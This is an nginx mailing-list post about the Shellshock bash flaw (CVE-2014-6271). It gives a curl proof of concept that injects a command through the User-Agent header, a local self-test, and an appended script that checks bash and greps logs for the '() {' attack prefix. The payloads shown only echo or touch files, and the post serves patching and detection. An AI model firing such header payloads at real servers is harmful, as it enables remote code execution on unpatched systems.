CVE-2014-6271 : Remote code execution through bash

mex
September 24, 2014 07:53PM
Hi list,

The following bug (remote code execution through bash)
http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

**might** affect you if you use a shell/bash-based fcgi-wrapper like in the following
recipe: http://wiki.nginx.org/Fcgiwrap / http://wiki.nginx.org/FcgiwrapDebianInitScript
(I did not test it); if someone runs a shell-based cgi-wrapper and would like to test the PoC from
reddit, I'd be interested in the result :D

curl -v -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa' http://example.com/path/to/file


At least I can confirm this affects bash-based CGIs.
ssh-based gitolite/gitlab et al. are affected too.


Local self-test:

# Output if vulnerable:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test


# Output if not vulnerable:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test



Additional references:

Advisory CVE-2014-6271: remote code execution through bash (oss-sec-ml)
http://seclists.org/oss-sec/2014/q3/649

Analysis 1 (oss-sec ml)
http://seclists.org/oss-sec/2014/q3/650

Analysis 2 (Red Hat)
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Naxsi-WAF Signatures
http://blog.dorvakt.org/2014/09/ruleset-update-possible-remote-code.html



Regards & happy patching
(and sorry for this slightly OT post)


mex
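The two checks in the post above (the `env x='() { :;}; ...'` self-test and the CGI header PoC) wrapped into a runnable script, as an added example that is not part of mex's post or of fcgiwrap. It also runs a grep for the `() {` function-definition prefix over a few constructed access-log lines, which is the pattern WAF signatures such as the Naxsi ruleset key on. The function names, the sample log lines and the "gateway" simulation (a plain `HTTP_USER_AGENT=... bash -c` stand-in for fcgiwrap, which likewise exports request headers as `HTTP_*` environment variables) are assumptions made for the example; the payload only creates a temporary marker file, so it is safe to run on any host.

```shell
#!/bin/sh
# Added example (not part of mex's post): the self-test wrapped as
# functions, a stand-in for what a CGI gateway does with a request header,
# and a grep over constructed access-log lines. Function names and the
# sample log lines are my own; the CGI simulation is a simplification of
# fcgiwrap, which likewise exports request headers as HTTP_* variables.

# Classic CVE-2014-6271 probe. A vulnerable bash executes the trailing
# "echo vulnerable" while importing the function-shaped variable x.
# Prints vulnerable, patched, or unknown (no bash on this host).
shellshock_status() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo unknown; return 0; }
    out=$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo test' 2>/dev/null || true)
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# Simulates the gateway: the User-Agent header is copied verbatim into
# HTTP_USER_AGENT and a bash CGI script runs. The payload only creates a
# marker file, so "executed" means bash ran code taken from the header.
cgi_probe() {
    marker=$(mktemp)
    rm -f "$marker"                 # the file reappearing is the signal
    payload="() { :;}; touch $marker"
    HTTP_USER_AGENT="$payload" bash -c 'printf "Content-Type: text/plain\r\n\r\nok\n"' >/dev/null 2>&1 || true
    if [ -e "$marker" ]; then
        rm -f "$marker"
        echo executed
    else
        echo ignored
    fi
}

# Both probes must tell the same story about the installed bash.
probes_agree() {
    case "$(shellshock_status):$(cgi_probe)" in
        vulnerable:executed|patched:ignored|unknown:ignored) echo yes ;;
        *) echo no ;;
    esac
}

# Constructed access-log lines (combined format); two carry the
# "() {" function-definition prefix in a header field.
sample_log() {
    cat <<'EOF'
203.0.113.5 - - [24/Sep/2014:19:53:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; echo aa>/tmp/aa"
198.51.100.7 - - [24/Sep/2014:19:53:02 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
192.0.2.9 - - [24/Sep/2014:19:53:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "() { :;}; /bin/true" "curl/7.37.0"
EOF
}

# Counts log lines containing the "() {" prefix anywhere in the line; the
# optional space also matches "(){". Prints the count.
scan_log() {
    sample_log | grep -Ec '\(\) *\{' || true
}

printf 'bash: %s\nheader payload: %s\nsuspicious log lines: %s\n' \
    "$(shellshock_status)" "$(cgi_probe)" "$(scan_log)"
```

Run it as `sh shellshock-check.sh`; on a patched bash it prints `patched` and `ignored`, on an unpatched one `vulnerable` and `executed`. The log grep is deliberately broad (it matches the prefix in any field, not just User-Agent), because the vulnerable path is any header that the gateway turns into an environment variable.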